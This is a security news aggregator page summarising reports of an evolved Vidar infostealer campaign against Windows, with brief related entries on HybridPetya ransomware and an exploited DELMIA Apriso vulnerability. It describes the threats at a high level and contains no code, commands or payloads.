CyberHappenings logo
☰
🏠 Home πŸ“‚ Browse ℹ️ About

Evolved Vidar Infostealer Campaigns Target Windows Environments

First reported
Last updated
πŸ“° 1 unique sources, 1 articles

Summary

Hide β–²

The Vidar infostealer, first tracked in late 2018, has evolved with new obfuscation techniques and enhanced stealth capabilities. This malware-as-a-service targets Windows environments, stealing credentials, financial data, and other sensitive information. It spreads through social engineering, malicious websites, and malvertising campaigns. The latest iteration uses encrypted command-and-control (C2) channels, Living-off-the-Land Binaries (LOLBins), and covert exfiltration methods to evade detection. The malware employs PowerShell scripts for stealthy payload retrieval, disguises traffic as legitimate PowerShell activity, and uses exponential backoff with jitter to avoid detection. It also attempts to bypass Windows Defender and Antimalware Scan Interface (AMSI) to maintain persistence and evade defenses. The C2 server used for data exfiltration is TLS-encrypted.

Timeline

  1. 11.09.2025 19:23 πŸ“° 1 articles

    Vidar Infostealer Campaigns Evolve with Enhanced Stealth and Persistence

    The Vidar infostealer has evolved with new obfuscation techniques and enhanced stealth capabilities. The latest iteration uses encrypted command-and-control (C2) channels, Living-off-the-Land Binaries (LOLBins), and covert exfiltration methods. The malware employs PowerShell scripts for stealthy payload retrieval and attempts to bypass Windows Defender and Antimalware Scan Interface (AMSI) to maintain persistence. The C2 server used for data exfiltration is TLS-encrypted. The malware spreads through social engineering, malicious websites, and malvertising campaigns, targeting Windows environments to steal sensitive information.

    Show sources
    Open in new tab

Information Snippets

  • Vidar infostealer is a malware-as-a-service that targets Windows environments.

    First reported: 11.09.2025 19:23
    πŸ“° 1 source, 1 article
    Show sources

  • The malware steals credentials, operating system details, cookies, financial data, and authentication tokens.

    First reported: 11.09.2025 19:23
    πŸ“° 1 source, 1 article
    Show sources

  • Vidar spreads through social engineering, malicious websites, and malvertising campaigns.

    First reported: 11.09.2025 19:23
    πŸ“° 1 source, 1 article
    Show sources

  • The latest iteration uses encrypted C2 channels, LOLBins, and covert exfiltration methods.

    First reported: 11.09.2025 19:23
    πŸ“° 1 source, 1 article
    Show sources

  • The malware employs PowerShell scripts for stealthy payload retrieval and evasion techniques.

    First reported: 11.09.2025 19:23
    πŸ“° 1 source, 1 article
    Show sources

  • Vidar attempts to bypass Windows Defender and AMSI to maintain persistence.

    First reported: 11.09.2025 19:23
    πŸ“° 1 source, 1 article
    Show sources

  • The C2 server used for data exfiltration is TLS-encrypted.

    First reported: 11.09.2025 19:23
    πŸ“° 1 source, 1 article
    Show sources

Similar Happenings

HybridPetya Ransomware Bypasses UEFI Secure Boot via CVE-2024-7344

A new ransomware strain, HybridPetya, has been discovered. It resembles the Petya/NotPetya malware and can bypass UEFI Secure Boot using the CVE-2024-7344 vulnerability. HybridPetya encrypts the Master File Table (MFT) on NTFS-formatted partitions and installs a malicious EFI application on the EFI System Partition. The ransomware has two main components: a bootkit and an installer. The bootkit handles encryption and decryption processes, displaying fake CHKDSK messages to deceive victims. The ransom note demands $1,000 in Bitcoin, with a wallet receiving $183.32 between February and May 2025. HybridPetya exploits a remote code execution vulnerability in the Howyar Reloader UEFI application, allowing it to bypass Secure Boot. The variant uses a specially crafted file named 'cloak.dat' to load the bootkit binary. Microsoft revoked the vulnerable binary in January 2025. ESET's telemetry data indicates no evidence of HybridPetya being used in the wild, suggesting it may be a proof-of-concept (PoC). The ransomware incorporates characteristics from both Petya and NotPetya, including the visual style and attack chain. It drops several files into the EFI System Partition, including configuration, validation, and encryption progress tracking files. The ransom note provides a 32-character key for decryption and system restoration upon payment. Indicators of compromise for HybridPetya are available on a GitHub repository. Microsoft fixed CVE-2024-7344 with the January 2025 Patch Tuesday updates.

Open in new tab

CVE-2025-5086 in DELMIA Apriso Exploited in the Wild

A critical deserialization vulnerability (CVE-2025-5086) in Dassault Systèmes DELMIA Apriso Manufacturing Operations Management (MOM) software is being actively exploited. The flaw, with a CVSS score of 9.0, affects versions from Release 2020 through Release 2025. The vulnerability allows for remote code execution, and exploitation attempts have been observed originating from an IP address in Mexico. The attacks involve sending a malicious HTTP request with a Base64-encoded payload. The payload decodes to a Windows executable identified as "Trojan.MSIL.Zapchast.gen," a spyware capable of capturing user activities and sending collected information to attackers. DELMIA Apriso is used in production processes for digitalizing and monitoring, including scheduling production, quality management, resource allocation, warehouse management, and integration between production equipment and business applications. The flaw impacts critical industries such as automotive, aerospace, electronics, high-tech, and industrial machinery. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to the Known Exploited Vulnerabilities (KEV) catalog and is advising federal agencies to apply necessary updates by October 2, 2025.

Open in new tab